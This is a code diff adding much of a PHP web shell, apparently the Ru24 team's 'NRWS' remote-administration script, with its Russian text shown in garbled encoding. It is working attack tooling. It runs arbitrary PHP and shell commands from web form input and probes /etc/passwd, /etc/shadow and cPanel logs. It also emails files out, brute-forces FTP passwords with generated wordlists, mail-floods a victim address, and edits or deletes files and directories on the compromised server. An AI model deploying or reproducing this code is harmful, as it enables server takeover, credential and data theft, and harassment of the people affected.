+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+  $info = "---==== Ñîîáùåíèå îò ($demail)====---\n\n";
+  $info .= "IP:\t$REMOTE_ADDR\n";
+  $info .= "HOST:\t$HTTP_HOST\n";
+  $info .= "URL:\t$HTTP_REFERER\n";
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+  $send_to = "$demail";
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+  if($send == 2)
+   echo "<br>
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+	<tr><td align=center>
+	<font color='#FFFFCC' face='Tahoma' size = 2>Ñïàñèáî!!!Ôàéë <b>$file</b> îòïğàâëåí âàì íà <u>$demail</u>.</font></center></td></tr></table><br>";
+
+fclose($fp);
+break;
+// ñïèñîê ïğîöåñîâ
+case "ps":
+echo "<b>Ïğîöåññû â ñèñòåìå:</b><br>";
+ 
+  echo "<br>";
+  if ($pid)
+  {
+   if (!$sig) {$sig = 9;}
+   echo "Îòïğàâëåíèå êîìàíäû ".$sig." to #".$pid."... ";
+   $ret = posix_kill($pid,$sig);
+   if ($ret) {echo "Âñå, ïğîöåñ óáèò, àìèíü";}
+   else {echo "ÎØÈÁÊÀ! ".htmlspecialchars($sig).", â ïğîöåñå #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Íåâîçìîæíî îòîáğàçèòü ñïèñîê ïğîöåñîâ ! Âèäíî çëîé àäìèí çàïğåòèë ps ";}
+  else
+  {
+   $ret = htmlspecialchars($ret);
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;}
+   if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;}
+   $k = $ps_aux_sort[0];
+   if ($ps_aux_sort[1] != "a") {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."a\"></a>";}
+   else {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."d\"></a>";}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$i.$ps_aux_sort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+	{
+	 echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10,count($line)));
+     $line = array_slice($line,0,11);
+     $line[] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+   $head[$k] = "<b>".$head[$k]."</b>".$y;
+   $head[] = "<b>ACTION</b>";
+   $v = $ps_aux_sort[0];
+   usort($prcs,"tabsort");
+   if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);}
+   $tab = array();
+   $tab[] = $head;
+   $tab = array_merge($tab,$prcs);
+   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=white borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+   foreach($tab as $k)
+   {
+    echo "<tr>";
+    foreach($k as $v) {echo "<td>".$v."</td>";}
+    echo "</tr>";
+   }
+   echo "</table>";
+  }
+break;
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>Èñïîëíåíèå ïõï êîäà (áåç "< ?  ? >")</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+// SEND MAIL
+case "sendmail":
+echo <<<HTML
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="sendmail">
+<tr>Îò êîãî: <br>
+<input type="TEXT" name="frommail">
+<br>Êîìó:<br> <input type="TEXT" name="tomailz">
+<br>Òåìà: <br><input type="TEXT" name="mailtema">
+<br>Òåêñò: <br>
+<td><textarea name="mailtext" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Îòïğàâèòü" name="submit"></td><form>
+$tend
+HTML;
+// íèêàêàÿ ïğîâåğêà íå äåëàåòñÿ, à çà÷åì ? =)
+if (isset($submit))
+{
+
+mail($tomailz,$mailtema,$mailtext,"From: $frommail");
+echo "<h2>Ñîîáùåíèå îòïğàâëåíî !</h2>";
+}
+break;
+
+
+// Èíôîğìàöèÿ î ñèñòåìå
+case "info":
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">Âêëş÷åíî</font>";
+}
+else {$safemode = false; $hsafemode = "Îòêëş÷åíî</font>";}
+/* display information */
+echo "<b>[ Èíôîğìàöèÿ î ñèñòåìå ]</b><br>";
+echo "<b>Õîñò:</b> ".$_SERVER["HTTP_HOST"]."<br>" ;
+echo "<b>IP ñåğâåğà:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>";
+echo " <b>Ñåğâåğ: </b>".$_SERVER['SERVER_SIGNATURE']."  ";
+echo "<b>OC:</b> ".exec("uname -a")."(";
+print "".php_uname()." )<br>\n";
+echo "<b>Safe-Mode: ".$hsafemode."</b><br>";
+echo "<b>Ïğèâèëåãèè: </b>".exec("id")."<br>";
+echo "<b>Âñåãî ìåñòà: </b>" . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb. " . "<b>Ñâîáîäíî: </b>: " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb. <br>";
+echo "<b>Òåêóùèé êàòàëîã:</b>".exec("pwd")."";
+echo " <br><b>Òåêóøèé web ïóòü: </b>".@$_SERVER['PHP_SELF']."  ";
+echo "<br><b>Òâîé IP:</b> ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")<br>";
+echo "<b>PHP version : </b>".phpversion()."<BR>";
+echo "<b> ID âëàäåëüöà ïğîöåñà : </b>".get_current_user()."<BR>";
+echo "<b>MySQL</b> : ".mysql_get_server_info()."<BR>";
+if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){
+print '<b>Åñòü äîñòóï ê /etc/passwd ! </b><br>';
+}
+if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){
+print '<b>Åñòü äîñòóï ê /etc/shadow !</b> <br>';
+}
+if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){
+print '<b>Åñòü äîñòóï ê /etc/shadow- !</b> ';
+}
+if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){
+print '<b>Åñòü äîñòóï ê /etc/master.passwd ! </b><br>';
+}
+if(isset($_POST['th']) && $_POST['th']!=''){
+chdir($_POST['th']);
+};
+if(is_writable('/tmp/')){
+$fp=fopen('/tmp/qq8',"w+");
+fclose($fp);
+print "/tmp - îòêğûòà&nbsp;<br>\n";
+unlink('/tmp/qq8');
+}
+else{
+print "<font color=red>/tmp - íå îòêğûòà</font><br>";
+}
+echo "<b>Áåçîïàñíûé ğåæèì: ".$hsafemode."</b><br>";
+if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   $num = $nixpasswd + $nixpwdperpage;
+   echo "<b>*nix /etc/passwd:</b><br>";
+   $i = $nixpasswd;
+   while ($i < $num)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid) {echo join(":",$uid)."<br>";}
+    $i++;
+   }
+  }
+  else {echo "<br><a href=?ac=navigation&d=/etc/&e=passwd><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/etc/userdomains")) {echo "<b><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></b><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/usr/local/apache/conf&e=httpd.conf><u><b>Êîíôèãóíàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+  { echo "<b><a href=?ac=navigation&d=/etc/httpd/conf&e=httpd.conf><u><b>Êîíôèãóíàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+   if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/etc/&e=httpd.conf><u><b>Êîíôèãóíàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+    if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/var/cpanel&e=accounting.log><u><b>cpanel log  </b></u></a></b><br>";}
+ break;
+ 
+// Î ñêğèïòå
+case "about":
+
+echo "<center><b>Ïğèâåò âñåì</b></center>Ïåğåä âàìè ïåğâàÿ âåğñèÿ ìîåãî ñêğèïòà óäàëåííîãî àäìèíèñòğèğîâàíèÿ.<b>(0.5a)</b> <br>Ñêğèïò íàõîäèòñÿ â ñòàäèè òåñòèğîâàíèÿ, òàê, ÷òî åñëè íàéäåòå êàêèå-òî áàãè, îáğàùàéòåñü ñşäà:<br><a href='http://ru24-team.net/forum/'>http://ru24-team.net/forum/</a> èëè <a href=mailto:dreamerz@mail.ru>íà ìûëî dreamerz@mail.ru</a>, èëè íà <a href=http://dreamerz.cc>dreamerz.cc</a>, èëè íà ICQ: <b>817312</b><br>Êòî õî÷åò ïîó÷àñòâîâàòü â ğàçğàáîòêå ñêğèïòà - ïèøèòå, ïîêàçóéòå ÷òî âû ìîæåòå äîáàâèòü è èñïğàâèòü...<br>Íó, è ñïàñèáî ıòèì ëşäÿì: Terabyte, 1dt_wolf, xoce, FUF, dodbob, Nitrex ... è ìíîãèì äğóãèì ...";
+echo "<br> È èñïîëüçóÿ ıòîò ñêğèïò íà ÷óæèõ ñåğâåğàõ âû íàğóøàåòå çàêîí :) Òàê ÷òî îñòîğîæíåå. ";
+
+echo "<br><br><br>Íîâàÿ âåğñèÿ ëåæèò çäåñü: <a href=http://ru24-team.net/releases/nr.rar>http://ru24-team.net/releases/nr.rar</a>
+<br><br><center><b>------------------------------->>> Ru24 - TEAM NRWS RELEASE 0.5.a [DreAmeRz] <<<-----------------------------------</b></center>";
+break;
+// ÔÒÏ ïîäáîğ ïàğîëåé
+case "ftppass":
+
+$filename="/etc/passwd"; // passwd file
+$ftp_server="localhost"; // FTP-server
+
+echo "FTP-server: <b>$ftp_server</b> <br><br>";
+
+$fp = fopen ($filename, "r");
+if ($fp)
+{
+while (!feof ($fp)) { 
+$buf = fgets($fp, 100);
+ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+$ftp_user_name=$g[1];
+$ftp_user_pass=$g[1];
+$conn_id=ftp_connect($ftp_server);
+$login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
+
+if (($conn_id) && ($login_result)) {
+echo "<b>Ïîäêëş÷åíèå  login:password - ".$ftp_user_name.":".$ftp_user_name."</b><br>";
+ftp_close($conn_id);}
+else {
+echo $ftp_user_name." - error<br>";
+}
+}}
+break;
+
+case "ftp":
+
+echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
+ <form action='$PHP_SELF?ac=ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+ <b><a href=?ac=ftppass>Ïğîâåğèòü íà ñâÿçêó login\password</a></b>
+</td></tr>
+ 
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Êîëëè÷åñòâî ïàğîëåé:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10> <1000 pass </td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Ïàğîëü äëÿ ïğîâåğêè:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='proverka' size=50>
+<input type='submit' value='Brut FTP' class=button1 $style_button><br><b>Ëîã ñîõğàíÿåòñÿ â pass.txt</b></td></tr>
+
+
+ 
+ </form></table>";
+ 
+ 
+function s() {
+   $word="qwrtypsdfghjklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+
+function g() {
+   $word="euioam";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+
+function name0() {   return s().g().s();                        }
+function name1() {   return s().g().s().g();                    }
+function name2() {   return s().g().g().s();                    }
+function name3() {   return s().s().g().s().g();                }
+function name4() {   return g().s().g().s().g();                }
+function name5() {   return g().g().s().g().s();                }
+function name6() {   return g().s().s().g().s();                }
+function name7() {   return s().g().g().s().g();                }
+function name8() {   return s().g().s().g().g();                }
+function name9() {   return s().g().s().g().s().g();            }
+function name10() {   return s().g().s().s().g().s().s();        }
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+function randword() {
+   global $cool;
+   $func="name".mt_rand(0,11);
+   $func2="name".mt_rand(0,11);
+   switch (mt_rand(0,11)) {
+      case 0: return $func().mt_rand(5,99);
+      case 1: return $func()."-".$func2();
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+      case 3: return $func()."!".$func();
+      case 4: return randpass(mt_rand(5,12));
+      default: return $func();
+   }
+ 
+ 
+}
+
+function randpass($len) {
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+   $s="";
+   for ($i=0; $i<$len; $i++) {
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+   }
+   return $s;
+}
+if (@unlink("pass.txt") < 0){
+echo "íåòó íè÷åãî";
+exit;
+}
+$file="pass.txt"; 
+if($file && $host && $login){
+   $cn=mt_rand(30,30);
+for ($i=0; $i<$cn; $i++) {
+   $s=$cool2[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$s\n");
+   }
+ 
+  $cnt2=mt_rand(43,43);
+for ($i=0; $i<$cnt2; $i++) {
+   $r=$cool[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$login$r\n");
+}    
+$p="$proverka";
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$p\n");
+   
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$u\n");
+  } 
+  
+  if(is_file($file)){
+ $passwd=file($file,1000);
+  for($i=0; $i<count($passwd); $i++){
+   $stop=false;
+   $password=trim($passwd[$i]);
+   $open_ftp=@fsockopen($host,21);
+    if($open_ftp!=false){
+     fputs($open_ftp,"user $login\n");
+     fputs($open_ftp,"pass $password\n");
+     while(!feof($open_ftp) && $stop!=true){
+      $text=fgets($open_ftp,4096);
+      if(preg_match("/230/",$text)){
+       $stop=true;
+	   $f=@fopen($host._ftp,"a+");
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+       echo "
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Ïîçäğàâëÿş!!! Ïàğîëü ïîäîáğàí.</font></b><br>
+&nbsp;&nbsp;Êîíåêò: <b>$host</b><br>&nbsp;&nbsp;Ëîãèí: <b>$login</b><br>&nbsp;&nbsp;Ïàğîëü: <b>$password</b></td></tr></table>
+";exit;
+      }
+      elseif(preg_match("/530/",$text)){
+       $stop=true;
+      
+      }
+     }
+     fclose($open_ftp);
+   }else{
+    echo "
+	<TABLE CELLPADDING=0 CELLSPACING=0  width=500 align=center>
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>Íå âåğíî óêàçàíî ôòï õîñòèíãà!!! Íà <b><u>$host</u></b> çàêğûò 21 ïîğò</b></b></td></tr>
+</table>
+";exit;
+   }
+  }
+ }
+}
+
+
+break;
+// SQL Attack
+case "sql":
+
+break;
+
+
+
+
+
+
+// MailFlud
+case "mailfluder":
+
+$email=$_POST['email']; // Ìûëî æåğòâû
+$from=$_POST['from']; // Ìûëî æåğòâû
+$num=$_POST['num']; // ×èñëî ïèñåì
+$text=$_POST['text']; // Òåêñò ôëóäà
+$kb=$_POST['kb']; // Âåñ ïèñüìà (kb)
+?>
+<script language="JavaScript"><!--
+function reset_form() {
+document.forms[0].elements[0].value="";
+document.forms[0].elements[1].value="";
+document.forms[0].elements[2].value="";
+document.forms[0].elements[3].value="";
+document.forms[0].elements[4].value="";
+}
+//--></script>
+<?php
+if (($email!="" and isset($email)) and ($num!="" and isset($num)) and ($text!="" and isset($text)) and ($kb!="" and isset($kb))) {
+
+$num_text=strlen($text)+1; // Îïğåäåëÿåò äëèííó òåêñòà + 1 (ïğîáåë â êîíöå)
+$num_kb=(1024/$num_text)*$kb;
+$num_kb=ceil($num_kb);
+
+for ($i=1; $i<=$num_kb; $i++) {
+$msg=$msg.$text." ";
+}
+
+for ($i=1; $i<=$num; $i++) {
+mail($email, $text, $msg, "From: $from");
+}
+
+$all_kb=$num*$kb;
+
+echo <<<EOF
+<p align="center">Æåğòâà: <b>$email</b><br>
+Êîë-âî ïèñåì: <b>$num</b><br>
+Îáùèé ïîñëàííûé îáúåì: <b>$all_kb kb</b><br></p>
+EOF;
+
+}
+
+else {
+
+echo <<<EOF
+<form action="?ac=mailfluder" method="post">
+<table align="center" border="0" bordercolor="#000000">
+<tr><td>Ìûëî æåğòâû</td><td><input type="text" name="email" value="to@mail.com" size="25"></td></tr>
+<tr><td>Îò ìûëà</td><td><input type="text" name="from" value="sypport@mail.com" size="25"></td></tr>
+<tr><td>×èñëî ïèñåì</td><td><input type="text" name="num" value="5" size="25"></td></tr>
+<tr><td>Òåêñò ôëóäà</td><td><input type="text" name="text" value="fack fack fack" size="25"></td></tr>
+<tr><td>Âåñ ïèñüìà (kb)</td><td><input type="text" name="kb" value="10" size="25"></td></tr>
+<tr><td colspan="2" align="center"><input type="submit">&nbsp;&nbsp;<input type="button" onclick="reset_form()" value="Reset"></td></tr>
+</table>
+</form>
+EOF;
+
+}
+break;
+
+case "tar":
+# àğõèâàöèÿ äèğåêòîğèè
+$fullpath = $d."/".$tar;
+/* çàäàåì ğàíäîìíûå íàçâàíèÿ ôàéëîâ àğõèâàöèè*/
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+for ($i=0; $i<6; $i++)  $charsname .= $CHARS[rand(0,strlen($CHARS)-1)];
+ echo "<br>
+Êàòàëîã <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $charsname.tar.gz")."óïàêîâàí â ôàéë <u>$charsname.tar.gz</u>";
+
+
+
+echo "
+
+<form action='?ac=tar' method='post'>
+<tr><td align=center colspan=2 class=pagetitle><b>Àğõèâàöèÿ <u>$name.tar.gz</u>:</b></td></tr>
+<tr>
+<td valign=top><input type=text name=archive size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+<td valign=top><input type=submit value='Äàâè'></td>
+</tr></form>";
+
+exec($archive);
+
+break;
+
+
+// Íàâèãàöèÿ
+case "navigation":
+ // Ïîøëà íàâèãàöèÿ
+$mymenu = "  [<a href='$php_self?ac=navigation&d=$d&e=$e&delete=1'>Óäàëèòü</a>] [<a href='$php_self?ac=navigation&d=$d&ef=$e&edit=1'>Ğåäàêòèğîâàòü</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&clean=1'>Î÷èñòèòü</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&replace=1'>Çàìåíèòü òåêñò</a>] [<a href='$php_self?ac=navigation&d=$d&download=$e'>Çàãğóçèòü</a>]  [<a href='$php_self?ac=navigation&d=$d&infofile=$e'>Èíôîğìàöèÿ</a>]<br>";
+
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+
+
+
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?ac=navigation&d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?ac=navigation&d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?ac=navigation&d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+echo "</td></tr>";
+echo "<br><td><b>id:</b> ".@exec('id')."</td></tr";
+
+
+if(@$_GET['deldir']=="1"){
+
+@$dir=$_GET['d'];
+function deldir($d)
+{
+$handle = @opendir($d);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$d/$ff")){
+deldir("$d/$ff");
+}else{
+@unlink("$d/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($d)){
+@$success = true;}
+return @$success;
+}
+$dir=@$d;
+deldir($d);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<br><b>Êàòàëîã óäàëåí !</b>";
+echo $copyr;
+exit;}
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo $mymenu ;
+echo "
+Ñğåäñòâî çàìåíû:<br>
+(Òû ìîæåø çàìåíÿòü ëşáîé òåêñò)<br>
+Ôàéë: $de<br>
+<form method=post>
+1. Òâîé IP.<br>
+2. microsoft.com IP :)<br>
+Çàìåíÿòü ıòî <input name=this size=30 value=$ip> ıòèì <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=Çàìåíèòü>
+</form>
+";
+
+if(@$_POST['doit']){
+
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$this","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$this Çàìåíåíî íà $bythis<br>
+[<a href='$php_self?ac=navigation&d=$d&e=$e'>Ïîñìîòğåòü ôàéë</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="Óäàëèë $d/$e íå ïàğñÿ ! <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?ac=navigation&d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red><br><b>ÒÎËÜÊÎ ×ÒÅÍÈÅ</b></font><br>";}}
+echo $mymenu ;
+echo "
+Ñîäåğæèìîå ôàéëà:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>";
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+Óäàëåíèå: Òû óâåğåí ?<br>
+<a href=\"$php_self?ac=navigation&d=$d&e=$e&delete=".@$delete."&yes=yes\">Äà</a> || <a href='$php_self?no=1'>Íåò</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red><br><b>ÒÎËÜÊÎ ×ÒÅÍÈÅ</b></font><br>";}}
+echo $mymenu ;
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+Ğåäàêòèğîâàíèå:<br>
+$de<br>
+<form method=post>
+<input type=HIDDEN name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='Ñîõğàíèòü èçìåíèÿ'></form><br>
+
+";
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+$editf=stripslashes($editf);
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$ef\">";
+exit;
+}
+ 
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<a href='?ac=tar&d=$d' title='Àğõèâàöèÿ ïğîèçîéäåò òîëüêî ïğè íàëè÷èè ïğàâ çàïèñè â êàòàëîã !'><b>[Àğõèâàöèÿ êàòàëîãà] </b></a>
+<a href='?ac=tar&as=mail&d=$d' title='Ïğîèñõîäèò àğõèâàöèÿ êàòàëîãà + îòïğàâêà àğõèâà íà âàø e-mail ! Ô-öèÿ íå äîñòóïíà â 0.5à âåğñèè!'><b>[Àğõèâàöèÿ êàòàëîãà + Îòïğàâêà íà å-mail] </b></a>
+<a href='?ac=navigation&d=$d&deldir=1' title='Ïîëíîå óäàëåíèå êàòàëîãà !\n Ñïğàøèâàòü ïîäòâåğæäåíèÿ òåáÿ íèêòî íå áóäåò :)'><b>[Óäàëåíèå êàòàëîãà] </b></a>
+<tr><td bgcolor=#4d9ef0><center><b>Íàçâàíèå</b></td><td bgcolor=#4d9ef0><b>Ğàçìåğ</b></td><td bgcolor=#4d9ef0><b>Äîñòóï</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>Êàòàëîã íå ñóùåñòâóåò èëè äîñòóï ê íåìó çàïğåùåí !</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
